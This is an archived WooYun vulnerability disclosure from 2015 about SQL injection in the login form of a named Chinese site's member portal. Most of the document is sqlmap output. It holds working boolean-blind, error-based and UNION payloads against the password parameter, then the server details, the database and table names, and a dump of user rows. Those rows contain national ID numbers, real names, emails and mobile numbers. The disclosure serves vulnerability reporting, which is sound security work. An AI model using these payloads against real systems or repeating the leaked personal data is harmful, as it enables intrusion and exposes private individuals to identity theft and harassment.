乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-05: 厂商已经主动忽略漏洞,细节向公众公开
http://erp.csztv.cn/member --forms
Place: POSTParameter: password Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: username=EkfU&password=-6480' OR (5389=5389)#&submit=%E7%99%BB %E5%BD%95 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: username=EkfU&password=' AND (SELECT 8421 FROM(SELECT COUNT(*),CONCAT(0x3a6e766f3a,(SELECT (CASE WHEN (8421=8421) THEN 1 ELSE 0 END)),0x3a6779793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bjHd'='bjHd&submit=%E7%99%BB %E5%BD%95 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: username=EkfU&password=' UNION ALL SELECT CONCAT(0x3a6e766f3a,0x56706b4753516b416c69,0x3a6779793a),NULL,NULL,NULL,NULL#&submit=%E7%99%BB %E5%BD%95---web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)web application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0available databases [4]:[*] aitupu[*] bang[*] information_schema[*] vote
Database: bang[77 tables]+----------------------------+| adcenter || att_daka_detail_his || att_daka_his || att_leave || att_log_his || att_members || att_task || att_train || att_train_user || att_usertask || bang_action_prize || bang_candidate || bang_capta || bang_changelog || bang_event || bang_group || bang_hostip || bang_mob_dinfo || bang_mob_gg || bang_module || bang_news || bang_node || bang_option_his || bang_page_option || bang_page_option_bak || bang_page_option_old || bang_page_result || bang_page_title || bang_phone || bang_phone_tamp || bang_poll || bang_poll_info || bang_poll_info_temp || bang_poll_infot || bang_poster || bang_rank_news || bang_rank_trade || bang_sessions || bang_sign || bang_smsinfo || bang_smsinfo_back || bang_survey || bang_tjinfo || bang_tjtype || bang_user || bang_user_action || bang_user_group || bang_user_group_permission || bang_user_permission || class || contable || host13_image || host13_news || host_image || host_news || intorder || poll_ads || poster || qauserinfo || range || test_test || torder || trade || userinfo || wy_action || wy_capta || wy_student || wy_vote || yd_daka_detail_his || yd_daka_his || yd_leave || yd_log_his || yd_members || yd_task || yd_train || yd_train_user || yd_usertask |+----------------------------+back-end DBMS: MySQL 5.0Database: bang+-----------+---------+| Table | Entries |+-----------+---------+| bang_user | 47828 |+-----------+---------+Database: bangTable: bang_user[14 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| age | int(4) || ban | tinyint(4) || banreason | varchar(200) || email | varchar(50) || id | int(11) || idcard | varchar(20) || income | int(6) || isok | int(1) || mobile | bigint(12) || name | varchar(50) || point | double || rname | varchar(20) || sex | int(4) || uid | int(11) |+-----------+--------------++----+-------+--------------------+-----+-----+-----+-------------+------+---------+--------+-------------------------+-------------+--------+-----------+| id | uid | idcard | age | ban | sex | name | isok | rname | point | email | mobile | income | banreason |+----+-------+--------------------+-----+-----+-----+-------------+------+---------+--------+-------------------------+-------------+--------+-----------+| 2 | 2 | 320502198708254568 | 3 | 0 | 0 | hello | 1 | <blank> | 1200 | <blank> | 0 | 3 | <blank> || 12 | 1387 | 320502197410182014 | 3 | 0 | 0 | hoho | 1 | 陆彬彬 | 2604 | [email protected] | 18762433406 | 3 | <blank> || 13 | 47 | 321302198802170038 | 2 | 0 | 0 | 苍老师 | 1 | 张乐乐 | 1260 | [email protected] | 13814846955 | 3 | <blank> || 14 | 16538 | <blank> | 0 | 0 | 0 | 13584808226 | 0 | <blank> | 450 | <blank> | 2147483647 | 0 | <blank> || 15 | 16789 | <blank> | 4 | 0 | 0 | hello123 | 1 | <blank> | 1230 | <blank> | 18762433406 | 4 | <blank> || 16 | 16790 | <blank> | 0 | 0 | 0 | hello12345 | 0 | <blank> | 50 | <blank> | 2147483647 | 0 | <blank> || 31 | 14967 | 32052519880804255x | 2 | 0 | 0 | jeson | 1 | <blank> | 2184 | <blank> | 0 | 1 | <blank> || 19 | 12 | 320502197410182019 | 3 | 0 | 0 | 与钱有关 | 1 | <blank> | 6145 | <blank> | 0 | 5 | <blank> || 26 | 13582 | <blank> | 28 | 0 | 1 | 素颜baby | 1 | <blank> | 4280 | <blank> | 0 | 3500 | <blank> || 24 | 16815 | <blank> | 20 | 0 | 0 | testnewuser | 1 | <blank> | 1050 | <blank> | 18762433406 | 127 | <blank> || 27 | 71 | 320504198809053769 | 2 | 0 | 1 | 一枚肉丸子 | 1 | <blank> | 1160 | <blank> | 0 | 1 | <blank> || 28 | 234 | <blank> | 23 | 0 | 1 | 偶们结婚吧 | 1 | <blank> | 1340 | <blank> | 0 | 2333 | <blank> || 29 | 13908 | <blank> | 0 | 0 | 0 | 格子小妞 | 0 | <blank> | 180 | <blank> | 0 | 0 | <blank> || 32 | 1668 | <blank> | 0 | 0 | 0 | 不吃羊肉的筒子 | 0 | <blank> | 0 | <blank> | 0 | 0 | <blank> || 33 | 129 | <blank> | 0 | 0 | 0 | 唐僧家的猫 | 0 | <blank> | 0 | <blank> | 0 | 0 | <blank> |+----+-------+--------------------+-----+-----+-----+-------------+------+---------+--------+-------------------------+-------------+--------+-----------+
预编译+sql参数话过滤
危害等级:无影响厂商忽略
忽略时间:2015-12-05 09:38
漏洞Rank:4 (WooYun评价)
暂无